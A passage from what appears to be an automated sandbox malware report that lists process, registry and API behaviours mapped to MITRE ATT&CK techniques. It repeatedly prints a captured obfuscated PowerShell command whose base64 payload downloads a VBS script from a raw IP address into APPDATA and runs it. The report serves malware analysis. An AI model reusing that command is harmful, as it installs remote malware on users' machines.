\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"powershell.exe\" (Path: \"HKCU\\CONTROL PANEL\\INTERNATIONAL\"; Key: \"SYEARMONTH\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR-SA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR-SA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG-BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG-BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA-ES\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA-ES\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-HANS\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-HANS\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-CN\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-CN\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS-CZ\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS-CZ\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"DA\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"cmd.exe\" called \"CreateProcessW\" with parameter \"pOWershell.exe -ex bypASS -NOP\" - (UID: 00000000-00002724)\n \"powershell.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"%TEMP%\\bbotlxd5\\bbotlx\" - (UID: 00000000-00006096), \"csc.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:%LOCALAPPDATA%\\Temp\" - (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"powershell.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64390000\n \"powershell.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64B40000\n \"csc.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64B40000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"iexplore.exe\" with commandline \"SCODEF:5760 CREDAT:275457 /prefetch:2\" (UID: 00000000-00005960)\n Spawned process \"cmd.exe\" with commandline \"\"/c pOWershell.exe -ex ...\" (UID: 00000000-00002724, Additional Context: \"'[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'$(IEx('[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'))\"), Spawned process \"powershell.exe\" with commandline \"-ex bypASS ...\" (UID: 00000000-00006096, Additional Context: \"'[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'$(IEx('[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'))\"), Spawned process \"csc.exe\" with commandline \"/noconfig /fullpaths @\"%TEMP%\\\\bbotlxd5\\\\bbotlxd5.cmdline\"\" (UID: 00000000-00005220), Spawned process \"cvtres.exe\" with commandline \"/NOLOGO /READONLY /MACHINE:IX86 \"/OUT:%TEMP%\\\\RES9B07.tmp\" \"%TEM ...\" (UID: 00000000-00002728)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"iexplore.exe\" with commandline \"SCODEF:5760 CREDAT:275457 /prefetch:2\" (UID: 00000000-00005960)\n Spawned process \"cmd.exe\" with commandline \"\"/c pOWershell.exe -ex ...\" (UID: 00000000-00002724, Additional Context: \"'[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'$(IEx('[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'))\"), Spawned process \"powershell.exe\" with commandline \"-ex bypASS ...\" (UID: 00000000-00006096, Additional Context: \"'[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'$(IEx('[sYStEM.TEXT.encOdinG]:'+[ChAR]0X3a+'UtF8.GetstrING([SYSTeM.CoNVERt]'+[chaR]0X3a+[chAr]0X3A+'fROMbASe64sTrING(\"JEdrb1B4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbWRjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExvS2Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdWlDeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1ZzdFpkblYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWJPY0x4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWU5aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGb3VoICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHa29QeDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi80MzAvZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29kLmdJRiIsIiRlTnY6QVBQREFUQVxnb29kZ2lybGFsd2F5c2JlYWdvb2RnaXJsd2l0aGJldHRlcnBlcnNvbmdvb2dpcmx3aXRoLnZicyIsMCwwKTtTdEFSVC1zbGVFcCgzKTtJbnZPa2UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcZ29vZGdpcmxhbHdheXNiZWFnb29kZ2lybHdpdGhiZXR0ZXJwZXJzb25nb29naXJsd2l0aC52YnMi\"))'))\"), Spawned process \"csc.exe\" with commandline \"/noconfig /fullpaths @\"%TEMP%\\\\bbotlxd5\\\\bbotlxd5.cmdline\"\" (UID: 00000000-00005220), Spawned process \"cvtres.exe\" with commandline \"/NOLOGO /READONLY /MACHINE:IX86 \"/OUT:%TEMP%\\\\RES9B07.tmp\" \"%TEM ...\" (UID: 00000000-00002728)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"csc.exe\" (UID: 00000000-00005220) was launched with new environment variables: \"computername=\"%OSUSER%-PC\", commonprogramfiles=\"%PROGRAMFILES%\\Common Files\", homedrive=\"C:\", pathext=\".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL\", psexecutionpolicypreference=\"Bypass\", path=\"C:\\Program Files\\Internet Explorer;;%ALLUSERSPROFILE%\\Oracle\\Java\\javapath;%WINDIR%\\system32;%WINDIR%\\%WINDIR%\\System32\\Wbem;%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\;%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\%OSUSER%\\AppData\\Local\\Programs\\Python\\Python38-32\\Scripts\\;C:\\Users\\%OSUSER%\\AppData\\Local\\Programs\\Python\\Python38-32\\;C:\\Users\\%OSUSER%\\AppData\\Local\\Programs\\Python\\Python36-32\\Scripts\\;C:\\Users\\%OSUSER%\\AppData\\Local\\Programs\\Python\\Python36-32\\\", comspec=\"%WINDIR%\\system32\\cmd.exe\", homepath=\"\\Users\\%OSUSER%\", sessionname=\"Console\", tmp=\"%LOCALAPPDATA%\\Temp\", processor_revision=\"4f00\", localappdata=\"%USERPROFILE%\\AppData\\Local\", userprofile=\"C:\\Users\\%OSUSER%\", number_of_processors=\"2\", programfiles=\"C:\\Program Files\", processor_level=\"6\", processor_architecture=\"x86\", processor_identifier=\"x86 Family 6 Model 79 Stepping 0\n GenuineIntel\", logonserver=\"\\\\%OSUSER%-PC\", systemroot=\"C:\\Windows\", 